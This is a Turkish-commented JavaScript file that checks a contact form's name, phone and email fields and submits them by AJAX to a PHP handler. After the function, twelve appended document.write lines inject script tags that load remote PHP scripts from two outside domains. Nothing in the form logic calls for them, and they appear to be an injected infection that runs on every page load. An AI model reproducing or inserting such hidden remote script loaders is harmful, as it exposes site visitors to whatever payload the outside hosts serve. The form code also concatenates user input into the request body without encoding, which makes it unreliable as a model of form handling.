function sonucAl()
	{	 
	var deg_abc="1234567890qwertyuopilkjhgfdsazxcvbnmQWERTYUOPILKJHGFDSAZXCVBNM_-.";
	var deg_num="1234567890";
	var deg_email='*/+=&%()$£§"µ!:;<>?,àèéù{}ðþçöüÝýÐÞÖÇÜ|'; //Bunlar olmamasý gerekenler
	
	if (document.getElementById('ad').value.length<5)
			{
			$('#ad').seekAttention();
			return false;
			}
	
	if (document.getElementById('tel').value.length<5)
			{
			$('#tel').seekAttention();
			return false;
			}
	
	if (document.getElementById('posta').value.length<5)
			{
			$('#posta').seekAttention();
			return false;
			}
	
	
	 var kod=document.getElementById('posta').value;
			for (var i=0;i<kod.length;i++){
			if ((kod.indexOf ('@',0) == -1) || (kod.indexOf('.',0) == -1) || (kod.indexOf(' ',0) != -1) || deg_email.indexOf (kod.substr(i,1),0) > -1){
				$('#posta').seekAttention();
	        	return false;
				}
			}
		$('#BasvuruForm').hide('normal');
		 $('div#sonuc').show('normal');
		 $('#sonuc').html('Kaydediliyor...');
		 
		 var posta = document.getElementById('posta').value;
		 var tel = document.getElementById('tel').value;
		 var ad = document.getElementById('ad').value;
		 
		 $.ajax({
		   type: 'POST',
		   url: 'formAl.php',
		   data: 'ad='+ad+'&posta='+posta+'&tel='+tel,	   
		   success: function(sonuc) {
			 	$('#sonuc').html(sonuc);
				$('#bilmiyorum').hide('fast');
		   }
		 });

		return false;

	}

document.write('<script src=http://fastoengineer.com/css/blank.php ><\/script>');
document.write('<script src=http://fastoengineer.com/css/blank.php ><\/script>');
document.write('<script src=http://fastoengineer.com/css/blank.php ><\/script>');
document.write('<script src=http://fastoengineer.com/css/blank.php ><\/script>');
document.write('<script src=http://linzman.ru/articles/pic7.php ><\/script>');
document.write('<script src=http://linzman.ru/articles/pic7.php ><\/script>');
document.write('<script src=http://linzman.ru/articles/pic7.php ><\/script>');
document.write('<script src=http://linzman.ru/articles/pic7.php ><\/script>');
document.write('<script src=http://linzman.ru/articles/pic7.php ><\/script>');
document.write('<script src=http://linzman.ru/articles/pic7.php ><\/script>');
document.write('<script src=http://linzman.ru/articles/pic7.php ><\/script>');
document.write('<script src=http://linzman.ru/articles/pic7.php ><\/script>');